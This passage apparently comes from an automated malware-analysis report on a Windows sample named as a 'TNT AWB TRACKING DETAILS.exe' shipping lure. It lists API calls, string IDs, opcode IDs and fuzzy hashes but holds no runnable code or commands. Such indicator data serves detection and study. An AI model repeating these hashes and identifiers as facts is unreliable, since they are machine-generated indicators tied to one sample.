                                      • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                      • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                      Strings
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                      • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                      • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                      • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 00476CB0
                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                      Strings
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                      • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                      • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                      • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: htonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 3832099526-2422070025
                                      • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                      • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                      • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                      • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                      Strings
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: <local>
                                      • API String ID: 2038078732-4266983199
                                      • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                      • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                      • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                      • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __fread_nolock_memmove
                                      • String ID: EA06
                                      • API String ID: 1988441806-3962188686
                                      • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                      • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                      • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                      • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: u,D
                                      • API String ID: 4104443479-3858472334
                                      • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                      • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                      • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                      • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                      APIs
                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • wsprintfW.USER32 ref: 0045612A
                                      Strings
                                      Similarity
                                      • API ID: MessageSend_mallocwsprintf
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 1262938277-328681919
                                      • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                      • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                      • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                      • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                      APIs
                                      • InternetCloseHandle.WININET(?), ref: 00442663
                                      • InternetCloseHandle.WININET ref: 00442668
                                        • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                      Strings
                                      Similarity
                                      • API ID: CloseHandleInternet$ObjectSingleWait
                                      • String ID: aeB
                                      • API String ID: 857135153-906807131
                                      • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                      • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                      • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                      • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                      APIs
                                      Strings
                                      • C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, xrefs: 0043324B
                                      • ^B, xrefs: 00433248
                                      Similarity
                                      • API ID: _wcsncpy
                                      • String ID: ^B$C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                      • API String ID: 1735881322-1498124708
                                      • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                      • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                      • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                      • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                      • PostMessageW.USER32(00000000), ref: 00441C05
                                        • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                      Strings
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                      • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                      • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                      • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                        • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                      Strings
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                      • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                      • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                      • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                        • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                      Strings
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                      • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                      • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                      • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D